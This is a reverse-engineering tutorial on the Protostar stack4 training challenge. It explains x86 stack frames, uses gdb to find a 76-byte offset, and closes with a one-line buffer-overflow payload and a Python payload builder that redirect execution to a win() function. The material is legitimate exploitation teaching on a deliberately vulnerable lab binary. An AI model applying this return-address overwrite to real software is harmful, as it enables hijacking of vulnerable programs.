
Practical Reverse Engineering Tutorials Part 2: Protostar Stack4

by Shantanu Goel


About the challenge

In this article, we’ll go through the Protostar stack4 challenge. It’s a bit similar to the stack0 challenge that we already tackled, but it will make us think about an interesting way to get alternate code to execute instead of just modifying data.

Pre-requisite: Make sure you’ve completed Part 1 of the Practical Reverse Engineering Tutorials series. It’d also be great if you try the stack1-stack3 challenges on your own, as they are similar to stack0.

Recon

Assuming you’ve done the setup as needed for Part 1 of this series, we jump straight to running the challenge to see what we’re after.

user@protostar:/opt/protostar/bin$ ./stack4
ABCD
user@protostar:/opt/protostar/bin$

So, we see that the program waits for some user input. When we input ‘ABCD’, nothing happens. That’s a bummer. We need to move on to static analysis to map out our next actions. Remember, it might be easier to look at the challenge’s source code (and it wouldn’t give much away either), but we’ll still try to avoid the source code as much as possible to give our brains more exercise.

Static Analysis

We first run our staple tool, strings, on the program to list interesting text data.

user@protostar:/opt/protostar/bin$ strings stack4
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
gets
puts
__libc_start_main
GLIBC_2.0
PTRh 
[^_]
code flow successfully changed
user@protostar:/opt/protostar/bin$ 

We see a potentially useful string, code flow successfully changed, straight away. I’d wager a guess that we have to get our currently dumb program to emit this string somehow. Let’s see under what condition this string is printed. So we bring out gdb like last time and check the disassembly of the main function.

user@protostar:/opt/protostar/bin$ gdb stack4 
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048408 <main+0>:	push   ebp
0x08048409 <main+1>:	mov    ebp,esp
0x0804840b <main+3>:	and    esp,0xfffffff0
0x0804840e <main+6>:	sub    esp,0x50
0x08048411 <main+9>:	lea    eax,[esp+0x10]
0x08048415 <main+13>:	mov    DWORD PTR [esp],eax
0x08048418 <main+16>:	call   0x804830c <gets@plt>
0x0804841d <main+21>:	leave  
0x0804841e <main+22>:	ret    
End of assembler dump.
(gdb) 

That’s interesting. There’s no way main can print the string we’re after, because it contains no print/puts call. In fact, main makes only one function call, to gets, to read user input. This means the string is printed from somewhere else, and our challenge is to get that code executed. We know from the previous challenge that to print this string, the program has to pass a pointer to it as a parameter to an output function (like puts). So, to find where this string is printed from, we first have to find the address where the string is located and then search for references to that address.

You may know that an executable file is divided into various sections. Generally, the executable code lives in a section called .text and literal strings live in a section called .rodata. So, our technique here is to:

  • Get the section addresses (using the gdb command maintenance info sections)
  • Search for the string’s address in the .rodata section (using the gdb command find <section_start_address>, <section_end_address>, <string>)
  • Search for a reference to the string’s address in the .text section (using the gdb command find <section_start_address>, <section_end_address>, <string_address>)
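The same two-step search can be sketched outside gdb in a few lines of Python. This is a minimal sketch under stated assumptions, not a real ELF parser: the two sections are hand-built byte strings, the first 8 bytes of .rodata are placeholders, and the .text bytes are only the first 13 bytes of win, reconstructed from its disassembly. find_all is a hypothetical helper. The key detail is that a 32-bit pointer is stored in little-endian byte order, so the pattern we look for in .text is e0 84 04 08.

```python
import struct


def find_all(haystack, needle, base):
    """Return the virtual address of every occurrence of needle in a section mapped at base."""
    hits = []
    start = haystack.find(needle)
    while start != -1:
        hits.append(base + start)
        start = haystack.find(needle, start + 1)
    return hits


# Hand-built stand-ins for the two sections (assumption: not parsed from the real ELF file).
RODATA_BASE = 0x80484d8
rodata = b"\x00" * 8 + b"code flow successfully changed\x00"  # first 8 bytes are placeholders

TEXT_BASE = 0x80483f4  # we only model the 13 bytes of .text at the start of win
# push ebp; mov ebp,esp; sub esp,0x18; mov DWORD PTR [esp],0x80484e0
text = bytes.fromhex("5589e583ec18c70424e0840408")

# Step 1: where does the string live in .rodata?
str_addrs = find_all(rodata, b"code flow successfully changed", RODATA_BASE)

# Step 2: which code contains that address as a 32-bit little-endian immediate?
refs = find_all(text, struct.pack("<I", str_addrs[0]), TEXT_BASE)

print([hex(a) for a in str_addrs], [hex(a) for a in refs])  # ['0x80484e0'] ['0x80483fd']
```

Note that the reference lands at 0x80483fd, inside the mov instruction rather than at its start, because the search matches the operand bytes.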

This is shown below:

(gdb) maintenance info sections
Exec file:
    `/opt/protostar/bin/stack4', file type elf32-i386.
    0x8048114->0x8048127 at 0x00000114: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048128->0x8048148 at 0x00000128: .note.ABI-tag ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048148->0x804816c at 0x00000148: .note.gnu.build-id ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x804816c->0x8048198 at 0x0000016c: .hash ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048198->0x80481b8 at 0x00000198: .gnu.hash ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x80481b8->0x8048218 at 0x000001b8: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048218->0x8048267 at 0x00000218: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048268->0x8048274 at 0x00000268: .gnu.version ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048274->0x8048294 at 0x00000274: .gnu.version_r ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048294->0x804829c at 0x00000294: .rel.dyn ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x804829c->0x80482bc at 0x0000029c: .rel.plt ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x80482bc->0x80482ec at 0x000002bc: .init ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x80482ec->0x804833c at 0x000002ec: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x8048340->0x80484bc at 0x00000340: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x80484bc->0x80484d8 at 0x000004bc: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x80484d8->0x80484ff at 0x000004d8: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8048500->0x8048504 at 0x00000500: .eh_frame ALLOC LOAD READONLY DATA HAS_CONTENTS
    0x8049504->0x804950c at 0x00000504: .ctors ALLOC LOAD DATA HAS_CONTENTS
    0x804950c->0x8049514 at 0x0000050c: .dtors ALLOC LOAD DATA HAS_CONTENTS
    0x8049514->0x8049518 at 0x00000514: .jcr ALLOC LOAD DATA HAS_CONTENTS
    0x8049518->0x80495e8 at 0x00000518: .dynamic ALLOC LOAD DATA HAS_CONTENTS
    0x80495e8->0x80495ec at 0x000005e8: .got ALLOC LOAD DATA HAS_CONTENTS
    0x80495ec->0x8049608 at 0x000005ec: .got.plt ALLOC LOAD DATA HAS_CONTENTS
    0x8049608->0x8049610 at 0x00000608: .data ALLOC LOAD DATA HAS_CONTENTS
    0x8049610->0x8049618 at 0x00000610: .bss ALLOC
    0x0000->0x0ad4 at 0x00000610: .stab READONLY HAS_CONTENTS
    0x0000->0x3bd2 at 0x000010e4: .stabstr READONLY HAS_CONTENTS
    0x0000->0x0039 at 0x00004cb6: .comment READONLY HAS_CONTENTS
(gdb) find 0x80484d8,0x80484ff,"code flow successfully changed"
0x80484e0
1 pattern found.
(gdb) x/s 0x80484e0
0x80484e0:	 "code flow successfully changed"
(gdb) find 0x8048340, 0x80484bc, 0x80484e0
0x80483fd <win+9>
1 pattern found.
(gdb) x/3i 0x80483fd
0x80483fd <win+9>:	loopne 0x8048383 <__do_global_dtors_aux+19>
0x80483ff <win+11>:	add    al,0x8
0x8048401 <win+13>:	call   0x804832c <puts@plt>
(gdb)

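Thus we figure out that the string is referenced from a function called win, as gdb shows. The x/3i output looks like garbage (loopne, add al,0x8) because find returned 0x80483fd, which is in the middle of an instruction: it’s where the 4-byte operand 0x80484e0 (stored little-endian as e0 84 04 08) of a mov begins, so gdb decodes those operand bytes as if they were instructions. We can confirm this by disassembling win, which also gives us the address we need to direct code execution to.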

(gdb) disassemble win
Dump of assembler code for function win:
0x080483f4 <win+0>:	push   ebp
0x080483f5 <win+1>:	mov    ebp,esp
0x080483f7 <win+3>:	sub    esp,0x18
0x080483fa <win+6>:	mov    DWORD PTR [esp],0x80484e0
0x08048401 <win+13>:	call   0x804832c <puts@plt>
0x08048406 <win+18>:	leave  
0x08048407 <win+19>:	ret    
End of assembler dump.
(gdb) 

So, we need to make our program start executing at 0x80483f4 (Entry point of function win) somehow.

A primer about X86 stack frames

Before continuing further, we will have to learn a bit about how program control works through stack frames. A stack frame is a region on the stack particular to a single function being executed in the call flow and represents its execution environment. If the same function is called many times, each instance of calling that function will have its own stack frame on the stack. A stack frame typically consists of:

  • Parameters passed to the function
  • Return address (Code location to jump to after the function is complete)
  • Pointer to the previous (Calling function’s) stack frame’s base
  • Local variables

Let’s see with the help of a small example how this works.

Sample Code
int foo(int a)
{
  int x = 2;
  int y = 3;
  x = a + x;
  return x;
}

int main()
{
  int a = 0;
  int b = 1;
  foo(a);
}

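Compiled as 32-bit code without optimizations, this produces assembly along the following lines (the exact output depends on the compiler and flags):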

foo:
push   ebp
mov    ebp,esp
sub    esp,0x10
mov    DWORD PTR [ebp-0x8],0x2
mov    DWORD PTR [ebp-0x4],0x3
mov    eax,DWORD PTR [ebp+0x8]
add    DWORD PTR [ebp-0x8],eax
mov    eax,DWORD PTR [ebp-0x8]
leave
ret

main:
push   ebp
mov    ebp,esp
sub    esp,0x14
mov    DWORD PTR [ebp-0x8],0x0
mov    DWORD PTR [ebp-0x4],0x1
mov    eax,DWORD PTR [ebp-0x8]
mov    DWORD PTR [esp],eax
call   0x80483ed <foo>
leave
ret

Stack frame

[Figure: Stack Frame of function foo]

Important registers

The x86 registers that one would be most interested in while understanding stack frames are:

  • esp: Stack Pointer. Points to (Holds address of) the current top of the stack
  • ebp: Base Pointer. Points to (Holds address of) the base of the current stack frame
  • eip: Instruction Pointer. Points to (Holds address of) the next instruction to be executed in the program
Calling Convention / Function Parameters

In the 32-bit x86 (cdecl) calling convention, the caller puts the parameters on the stack before calling the function, and the call instruction itself pushes the return address. This can be seen in the below instructions.

mov    DWORD PTR [esp],eax
call   0x80483ed <foo>

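Here, the mov instruction places the parameter a (loaded into eax by the preceding mov eax,DWORD PTR [ebp-0x8] in main) at the top of the stack. Strictly speaking, it doesn’t push: main already reserved this slot with sub esp,0x14, so the value is written to [esp] and esp doesn’t change.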

The call instruction is equivalent to pushing the address of the instruction that follows it (the return address) onto the stack and then jumping to the called function’s address. For the common 5-byte call rel32 form, this return address is the call’s own address plus 5, and it’s where execution continues after the called function returns.

Function Prologue / Entry Sequence

At the very beginning of a function, it first saves the calling function’s base pointer (ebp) onto the stack and then sets its own base pointer to the current top of the stack (esp), so the new frame’s base starts right where the caller’s stack ended. This can be seen in these instructions:

foo:
push   ebp
mov    ebp,esp
Local Variables

Then, space is created on the stack for holding any local variables.

sub    esp,0x10
Exit Sequence

Finally, after the function has executed, it returns by restoring the calling function’s stack and base pointers and then popping the next value (the return address) from the stack into eip.

leave
ret

Here, leave is equivalent to mov esp,ebp followed by pop ebp: it discards the local variables and restores the caller’s ebp. ret is equivalent to pop eip, so execution continues at the instruction right after the original function call.
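To make the call/prologue/leave/ret bookkeeping concrete, here is a toy Python model of the stack for the foo example. It’s a sketch under stated assumptions, not an emulator: ToyStack is a hypothetical helper, memory is a dict of 4-byte words, and the register values and return address are made-up numbers (only foo’s address 0x80483ed comes from the listing).

```python
class ToyStack:
    """Toy model of the 32-bit x86 stack instructions used by foo/main.

    Assumptions: 4-byte words, the stack grows towards lower addresses,
    and memory is a dict mapping addresses to word values.
    """

    def __init__(self, esp, ebp):
        self.esp = esp
        self.ebp = ebp
        self.eip = None
        self.mem = {}

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value

    def call(self, target, return_addr):
        self.push(return_addr)   # push the address of the next instruction...
        self.eip = target        # ...then jump to the callee

    def prologue(self, locals_size):
        self.push(self.ebp)      # push ebp
        self.ebp = self.esp      # mov ebp, esp
        self.esp -= locals_size  # sub esp, locals_size

    def leave(self):
        self.esp = self.ebp      # mov esp, ebp
        self.ebp = self.pop()    # pop ebp

    def ret(self):
        self.eip = self.pop()    # pop eip


RETURN_ADDR = 0x2005                  # hypothetical address of the instruction after `call foo`
cpu = ToyStack(esp=0x1000, ebp=0x1014)  # hypothetical main registers after `sub esp,0x14`
cpu.mem[cpu.esp] = 0                  # mov DWORD PTR [esp],eax: parameter a = 0
cpu.call(target=0x80483ed, return_addr=RETURN_ADDR)
cpu.prologue(locals_size=0x10)        # foo: push ebp; mov ebp,esp; sub esp,0x10

# Inside foo: saved ebp at [ebp], return address at [ebp+4], parameter a at [ebp+8]
print(hex(cpu.mem[cpu.ebp]), hex(cpu.mem[cpu.ebp + 4]), cpu.mem[cpu.ebp + 8])  # 0x1014 0x2005 0

cpu.leave()
cpu.ret()
print(hex(cpu.esp), hex(cpu.ebp), hex(cpu.eip))  # 0x1000 0x1014 0x2005
```

After ret, esp and ebp are back to main’s values and eip holds the return address, which is exactly the value an attacker wants to control.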

What we need to do

From the above analysis of the stack frame, we now know that:

  • Program flow is controlled through eip register
  • On returning from a called function, eip register is updated with a value (return address) from the stack
  • If we can somehow overflow a local variable on stack to modify the return address accurately, we can control the program execution.
  • Note that, just like foo, main has its own stack frame and returns to “something” after completing its execution. This “something” is the C runtime startup code that the compiler linked the program against (in glibc, main is reached via __libc_start_main, which we also saw in the strings output). So we can also try to change the execution path by modifying main’s return address.
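The third point above is the crux of this challenge. Below is a toy Python sketch of it, assuming a hypothetical frame in which a 16-byte local buffer sits directly below the saved ebp and the return address (real compilers may add padding in between). unchecked_copy is a hypothetical stand-in for gets(): it copies the input plus a NUL terminator without checking the length, and 0xdeadbeef is an arbitrary target address.

```python
import struct

BUF_SIZE = 16                # hypothetical local buffer: char buf[16]
SAVED_EBP_OFF = BUF_SIZE     # saved ebp sits right after the buffer in this toy layout
RET_OFF = BUF_SIZE + 4       # return address sits right after the saved ebp


def make_frame(saved_ebp, ret_addr):
    """32 bytes of toy stack: buffer, saved ebp, return address, then some caller data."""
    frame = bytearray(32)
    struct.pack_into("<I", frame, SAVED_EBP_OFF, saved_ebp)
    struct.pack_into("<I", frame, RET_OFF, ret_addr)
    return frame


def unchecked_copy(frame, data):
    """Mimics gets(): copies data plus a NUL terminator, with no bounds check against BUF_SIZE."""
    payload = data + b"\x00"
    if len(payload) > len(frame):
        raise ValueError("toy model only covers 32 bytes")
    frame[0:len(payload)] = payload


frame = make_frame(saved_ebp=0x1014, ret_addr=0x2005)  # hypothetical original values
unchecked_copy(frame, b"A" * RET_OFF + struct.pack("<I", 0xdeadbeef))

saved_ebp, ret_addr = struct.unpack_from("<II", frame, SAVED_EBP_OFF)
print(hex(saved_ebp), hex(ret_addr))  # 0x41414141 0xdeadbeef
```

The padding clobbers the saved ebp along the way, which is harmless for our purpose but explains why ebp ends up holding input bytes after leave.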
Gotchas

In some explanations, you may see that esp_main/StackFrame_main in the figure above also cover the parameter being passed to foo. However, I’ve excluded it here to avoid the confusion of overlapping stack frames.

Dynamic Analysis

Armed with our static analysis so far, we start our dynamic analysis. So, fire up gdb. We already know that main’s code is as below:

0x08048408 <main+0>:	push   ebp
0x08048409 <main+1>:	mov    ebp,esp
0x0804840b <main+3>:	and    esp,0xfffffff0
0x0804840e <main+6>:	sub    esp,0x50
0x08048411 <main+9>:	lea    eax,[esp+0x10]
0x08048415 <main+13>:	mov    DWORD PTR [esp],eax
0x08048418 <main+16>:	call   0x804830c <gets@plt>
0x0804841d <main+21>:	leave  
0x0804841e <main+22>:	ret    
End of assembler dump.

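We set breakpoints at a few locations: main’s entry, the instruction right after the stack frame is set up, the call to gets, and the leave and ret instructions: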

(gdb) b *0x08048408
Breakpoint 1 at 0x8048408: file stack4/stack4.c, line 12.
(gdb) b *0x08048411
Breakpoint 2 at 0x8048411: file stack4/stack4.c, line 15.
(gdb) b *0x08048418
Breakpoint 3 at 0x8048418: file stack4/stack4.c, line 15.
(gdb) b *0x0804841d
Breakpoint 4 at 0x804841d: file stack4/stack4.c, line 16.
(gdb) b *0x0804841e
Breakpoint 5 at 0x804841e: file stack4/stack4.c, line 16.

Now, we run the program till the first couple of breakpoints and analyze the registers/stack.

(gdb) r
Starting program: /opt/protostar/bin/stack4 

Breakpoint 1, main (argc=1, argv=0xbffff864) at stack4/stack4.c:12
12	stack4/stack4.c: No such file or directory.
	in stack4/stack4.c
(gdb) info r
eax            0xbffff864	-1073743772
ecx            0xb0a7a13f	-1331191489
edx            0x1	1
ebx            0xb7fd7ff4	-1208123404
esp            0xbffff7bc	0xbffff7bc
ebp            0xbffff838	0xbffff838
esi            0x0	0
edi            0x0	0
eip            0x8048408	0x8048408 <main>
eflags         0x200246	[ PF ZF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) c
Continuing.

Breakpoint 2, main (argc=1, argv=0xbffff864) at stack4/stack4.c:15
15	in stack4/stack4.c
(gdb) info r
eax            0xbffff864	-1073743772
ecx            0xb0a7a13f	-1331191489
edx            0x1	1
ebx            0xb7fd7ff4	-1208123404
esp            0xbffff760	0xbffff760
ebp            0xbffff7b8	0xbffff7b8
esi            0x0	0
edi            0x0	0
eip            0x8048411	0x8048411 <main+9>
eflags         0x200286	[ PF SF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x/24x $esp
0xbffff760:	0xb7fd7ff4	0xb7ec6165	0xbffff778	0xb7eada75
0xbffff770:	0xb7fd7ff4	0x080495ec	0xbffff788	0x080482e8
0xbffff780:	0xb7ff1040	0x080495ec	0xbffff7b8	0x08048449
0xbffff790:	0xb7fd8304	0xb7fd7ff4	0x08048430	0xbffff7b8
0xbffff7a0:	0xb7ec6365	0xb7ff1040	0x0804843b	0xb7fd7ff4
0xbffff7b0:	0x08048430	0x00000000	0xbffff838	0xb7eadc76
(gdb) x/4x $ebp
0xbffff7b8:	0xbffff838	0xb7eadc76	0x00000001	0xbffff864
(gdb)

We can see that the C runtime (or whatever it is that called main; we don’t need to get into what that is) uses 0xbffff838 as its base pointer (ebp), and main’s push ebp preserves this value at 0xbffff7b8. Then, main copies the current stack pointer (esp) into ebp, making it main’s new base pointer. After that, main aligns esp down to a 16-byte boundary, thus wasting 8 bytes, and then reserves a further 0x50 (80) bytes for its stack. After all these operations, the salient characteristics of main’s stack frame are as below:

  • Current stack top (esp) is 0xbffff760
  • Current base pointer (ebp) is 0xbffff7b8
  • Main’s calling function’s ebp is 0xbffff838 and preserved at 0xbffff7b8
  • Main’s return address (into its caller) is saved one word above the saved ebp, having been pushed by the caller’s call instruction. Thus the return address is 0xb7eadc76, as we can see at location 0xbffff7bc (ebp + 0x4 = 0xbffff7b8 + 0x4). This address 0xbffff7bc is the one we want to overwrite with the address of the win function, so that main’s ret jumps to win instead of back to main’s caller.
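The arithmetic behind these numbers can be replayed in a few lines of Python. This is just a sketch that re-applies main’s first four instructions to the esp value observed at breakpoint 1 (0xbffff7bc); it doesn’t read anything from the live process.

```python
ENTRY_ESP = 0xbffff7bc  # esp at breakpoint 1 (before push ebp); this slot holds main's return address

esp = ENTRY_ESP - 4     # push ebp: the caller's ebp (0xbffff838) is stored at the new esp
ebp = esp               # mov ebp, esp
esp &= 0xfffffff0       # and esp, 0xfffffff0: round down to a 16-byte boundary
aligned_gap = ebp - esp  # bytes skipped by the alignment
esp -= 0x50             # sub esp, 0x50: reserve space for locals and outgoing arguments

print(hex(ebp), hex(esp), aligned_gap)  # 0xbffff7b8 0xbffff760 8
print(hex(ebp + 4))                     # 0xbffff7bc, the saved return address slot
```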

Now, run till the next breakpoint.

(gdb) c
Continuing.

Breakpoint 3, 0x08048418 in main (argc=1, argv=0xbffff864)
    at stack4/stack4.c:15
15	in stack4/stack4.c
(gdb) x $esp
0xbffff760:	0xbffff770
(gdb)

So we see that the buffer in which gets stores the input string starts at 0xbffff770 (the argument to gets is the buffer address, and it is passed at the top of the stack, as we know from the previous section). We can see how far away this is from the address we want to overwrite by subtracting:

0xbffff7bc - 0xbffff770 = 0x4C (or 76 bytes)

So, the distance between our target location and the start of the input buffer is 76 bytes, which means that if we input 80 bytes, the 77th-80th bytes will overwrite the return address. We could go for the win (pun intended) already, but let’s continue to the rest of our breakpoints to confirm our theory.

(gdb) c
Continuing.
12345678901234567890123456789012345678901234567890123456789012345678901234567890

Breakpoint 4, main (argc=0, argv=0xbffff864) at stack4/stack4.c:16
16	in stack4/stack4.c
(gdb) x/24x $esp
0xbffff760:	0xbffff770	0xb7ec6165	0xbffff778	0xb7eada75
0xbffff770:	0x34333231	0x38373635	0x32313039	0x36353433
0xbffff780:	0x30393837	0x34333231	0x38373635	0x32313039
0xbffff790:	0x36353433	0x30393837	0x34333231	0x38373635
0xbffff7a0:	0x32313039	0x36353433	0x30393837	0x34333231
0xbffff7b0:	0x38373635	0x32313039	0x36353433	0x30393837
(gdb) info r $ebp
ebp            0xbffff7b8	0xbffff7b8
(gdb) c
Continuing.

Breakpoint 5, 0x0804841e in main (argc=Cannot access memory at address 0x3635343b
) at stack4/stack4.c:16
16	in stack4/stack4.c
(gdb) info r $ebp
ebp            0x36353433	0x36353433
(gdb) 

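We continue and enter an 80-byte pattern. The repeated pattern is visible on the stack, and its last 4 bytes, 7890 (0x30393837 when read as a little-endian word), have overwritten the saved return address at 0xbffff7bc, while the 73rd-76th bytes, 3456, have overwritten the saved ebp at 0xbffff7b8. We also see that if we stop after the leave instruction, the value 0x36353433 from address 0xbffff7b8 has been popped back into ebp. This also explains the odd argc values gdb prints: gets writes a terminating NUL byte right after our 80 bytes, at 0xbffff7c0, which zeroes argc (hence argc=0 at breakpoint 4), and after leave gdb tries to read argc from ebp + 8 = 0x3635343b, which is not a valid address.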
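As a quick cross-check, the two overwritten words can be recomputed from the input in Python. This sketch assumes the input was exactly the 80-byte string typed above; word_at is a hypothetical helper that reads 4 bytes the way gdb’s x/x displays a word on little-endian x86.

```python
import struct

pattern = b"1234567890" * 8  # the 80-byte input typed at the gets() prompt


def word_at(offset):
    """Interpret 4 input bytes as a little-endian 32-bit word, as gdb's x/x shows it."""
    return struct.unpack_from("<I", pattern, offset)[0]


saved_ebp = word_at(72)  # 73rd-76th bytes, landing at 0xbffff7b8
ret_addr = word_at(76)   # 77th-80th bytes, landing at 0xbffff7bc

print(hex(saved_ebp), hex(ret_addr))   # 0x36353433 0x30393837
print(pattern[72:76], pattern[76:80])  # b'3456' b'7890'
```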

Now, we find the address of the win function and use it, packed in little-endian byte order, as the last 4 bytes of an 80-byte input to crack the program.

(gdb) x win
0x80483f4 <win>:	0x83e58955
(gdb) quit
user@protostar:/opt/protostar/bin$ python -c 'print "A"*76+"\xf4\x83\x04\x08"' | ./stack4
code flow successfully changed
Segmentation fault
user@protostar:/opt/protostar/bin$ 
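The one-liner above relies on Python 2’s print statement. On a machine with Python 3, a minimal equivalent sketch is below; build_payload is a hypothetical helper, and it writes raw bytes through sys.stdout.buffer because Python 3’s print would encode characters like "\xf4" as multi-byte UTF-8 and corrupt the address. The Segmentation fault after the message is expected: the payload only replaces main’s return address, so when win itself executes ret, it pops whatever word sits just above that slot (main’s argc, whose low byte gets has just overwritten with its NUL terminator), which is not a valid code address.

```python
import struct
import sys

WIN_ADDR = 0x080483F4  # entry point of win(), from `disassemble win`
OFFSET = 76            # distance from the gets() buffer to the saved return address


def build_payload(offset=OFFSET, target=WIN_ADDR):
    """Padding up to the saved return address, then the target address packed little-endian."""
    return b"A" * offset + struct.pack("<I", target)


if __name__ == "__main__":
    # Raw bytes on stdout; the trailing newline ends gets()'s read.
    sys.stdout.buffer.write(build_payload() + b"\n")
```

Saved as, say, exploit.py (a hypothetical name), it would be used as python3 exploit.py | ./stack4.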

References / Lessons Learnt

In this article, we learnt:

  • Getting information about different sections of a program in gdb
  • Searching for values in a section of the program through gdb
  • Extending our knowledge of stack/buffer overflows to hijack program execution by overwriting a saved return address (the basic technique that return-to-libc and Return Oriented Programming (ROP) attacks build upon)
  • About stack frames and esp/ebp/eip registers

You can refer to the below links for reading up more about some of the things discussed above. If you have any queries or suggestions, please leave a comment here or ping me @shantanugoel
